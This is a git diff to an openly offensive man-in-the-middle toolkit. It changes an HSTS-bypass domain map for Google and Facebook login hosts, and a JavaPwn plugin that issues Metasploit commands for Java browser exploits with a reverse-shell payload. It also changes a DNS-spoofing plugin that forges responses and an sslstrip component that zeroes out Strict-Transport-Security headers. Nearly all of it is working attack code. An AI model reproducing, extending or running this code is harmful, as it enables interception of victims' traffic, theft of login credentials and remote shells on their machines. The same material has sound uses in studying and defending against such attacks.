diff --git a/config_files/hsts_bypass.cfg b/config_files/hsts_bypass.cfg index c4820c3..2b02ed0 100644 --- a/config_files/hsts_bypass.cfg +++ b/config_files/hsts_bypass.cfg @@ -1,7 +1,10 @@ #here you can configure your domains to bypass HSTS on #the format is real.domain.com = fake.domain.com +#for google and gmail accounts.google.com = account.google.com mail.google.com = gmail.google.com -www.facebook.com = social.facebook.com -accounts.google.se = cuentas.google.se \ No newline at end of file +accounts.google.se = cuentas.google.se + +#for facebook +www.facebook.com = social.facebook.com \ No newline at end of file diff --git a/plugins/BeefAutorun.py b/plugins/BeefAutorun.py index 2b1ad2d..264ac57 100644 --- a/plugins/BeefAutorun.py +++ b/plugins/BeefAutorun.py @@ -61,7 +61,7 @@ class BeefAutorun(Inject, Plugin): already_hooked = [] while True: sessions = beef.sessions_online() - if len(sessions) > 0: + if sessions is not None and len(sessions) > 0: for session in sessions: if session not in already_hooked: diff --git a/plugins/JavaPwn.py b/plugins/JavaPwn.py index 38fa57c..2fcb734 100644 --- a/plugins/JavaPwn.py +++ b/plugins/JavaPwn.py @@ -142,10 +142,8 @@ class JavaPwn(BrowserProfiler, Plugin): self.injectWait(msf, url, vic_ip) else: #here we setup the exploit - rand_url = self.rand_url() #generate a random url rand_port = random.randint(1000, 65535) #generate a random port for the payload listener - - + rand_url = self.rand_url() #generate the command string to send to the virtual console #new line character very important as it simulates a user pressing enter cmd = "use exploit/multi/browser/%s\n" % exploit @@ -165,10 +163,12 @@ class JavaPwn(BrowserProfiler, Plugin): logging.info("%s >> client is not vulnerable to any java exploit" % vic_ip) logging.info("%s >> falling back to the signed applet attack" % vic_ip) + rand_url = self.rand_url() + cmd = "use exploit/multi/browser/java_signed_applet\n" cmd += "set SRVPORT %s\n" % self.msfport cmd += "set URIPATH %s\n" % rand_url - cmd += "set PAYLOAD generic/shell_reverse_tcp\n" #chose this payload because it can be upgraded to a full-meterpreter (plus its multi-platform! Yay java!) + cmd += "set PAYLOAD generic/shell_reverse_tcp\n" cmd += "set LHOST %s\n" % self.msfip cmd += "set LPORT %s\n" % rand_port cmd += "exploit -j\n" diff --git a/plugins/Spoof.py b/plugins/Spoof.py index cd6e09b..a32163f 100644 --- a/plugins/Spoof.py +++ b/plugins/Spoof.py @@ -249,13 +249,14 @@ class Spoof(Plugin): def resolve_domain(self, domain): try: + #logging.info("Resolving -> %s" % domain) answer = dns.resolver.query(domain, 'A') real_ips = [] for rdata in answer: real_ips.append(rdata.address) if len(real_ips) > 0: - return real_ips[0] + return real_ips except Exception: logging.debug("Error resolving " + domain) @@ -266,6 +267,7 @@ class Spoof(Plugin): if not pkt.haslayer(DNSQR): payload.set_verdict(nfqueue.NF_ACCEPT) else: + #logging.info("Got DNS packet for %s %s" % (pkt[DNSQR].qname, pkt[DNSQR].qtype)) if self.dns: for k, v in self.dnscfg.items(): if k in pkt[DNSQR].qname: @@ -277,22 +279,33 @@ class Spoof(Plugin): if v == pkt[DNSQR].qname[:-1]: ip = self.resolve_domain(k) if ip: - self.modify_dns(payload, pkt, ip, hsts=True) - + self.modify_dns(payload, pkt, ip) + if 'wwww' in pkt[DNSQR].qname: ip = self.resolve_domain(pkt[DNSQR].qname[1:-1]) if ip: - self.modify_dns(payload, pkt, ip, hsts=True) + self.modify_dns(payload, pkt, ip) - def modify_dns(self, payload, pkt, ip, hsts=False): + if 'web' in pkt[DNSQR].qname: + ip = self.resolve_domain(pkt[DNSQR].qname[3:-1]) + if ip: + self.modify_dns(payload, pkt, ip) + + def modify_dns(self, payload, pkt, ip): spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) /\ - UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /\ - DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=ip)) + UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /\ + DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd) - payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt)) - if hsts: + if self.hsts: + spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip[0]); del ip[0] #have to do this first to initialize the an field + for i in ip: + spoofed_pkt[DNS].an.add_payload(DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=i)) + + payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt)) logging.info("%s Resolving %s for HSTS bypass" % (pkt[IP].src, pkt[DNSQR].qname[:-1])) - else: + + if self.dns: + spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip) logging.info("%s Modified DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1])) def start_dns_queue(self): @@ -343,8 +356,11 @@ class Spoof(Plugin): os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X') if (self.dns or self.hsts): - self.q.unbind(socket.AF_INET) - self.q.close() + try: + self.q.unbind(socket.AF_INET) + self.q.close() + except: + pass if self.arp: print '[*] Re-arping network' diff --git a/sslstrip/ServerConnection.py b/sslstrip/ServerConnection.py index 289e7ea..1210c92 100644 --- a/sslstrip/ServerConnection.py +++ b/sslstrip/ServerConnection.py @@ -100,6 +100,9 @@ class ServerConnection(HTTPClient): if (value.find('gzip') != -1): logging.debug("Response is compressed...") self.isCompressed = True + if (key.lower() == 'strict-transport-security'): + value = 'max-age=0' + elif (key.lower() == 'content-length'): self.contentLength = value elif (key.lower() == 'set-cookie'): diff --git a/sslstrip/URLMonitorHSTS.py b/sslstrip/URLMonitorHSTS.py index 602309a..35262ce 100644 --- a/sslstrip/URLMonitorHSTS.py +++ b/sslstrip/URLMonitorHSTS.py @@ -71,7 +71,7 @@ class URLMonitor: else: self.sustitucion[host] = "web"+host self.real["web"+host] = host - logging.debug("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) ) + #logging.info("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) ) url = 'http://' + host + path #logging.debug("LEO stripped URL: %s %s"%(client, url))